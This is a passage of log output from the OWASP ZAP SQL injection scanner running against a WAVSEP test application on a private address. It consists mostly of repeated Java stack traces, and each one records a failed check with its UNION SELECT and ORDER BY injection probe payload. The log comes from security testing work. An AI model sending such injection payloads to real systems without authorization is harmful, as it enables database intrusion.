at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682554 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 2951#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 2951# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682555 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682556 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682557 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682558 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682559 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682559 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682560 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682561 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682562 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682563 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682564 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682564 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') ORDER BY 7642#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 7642# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at 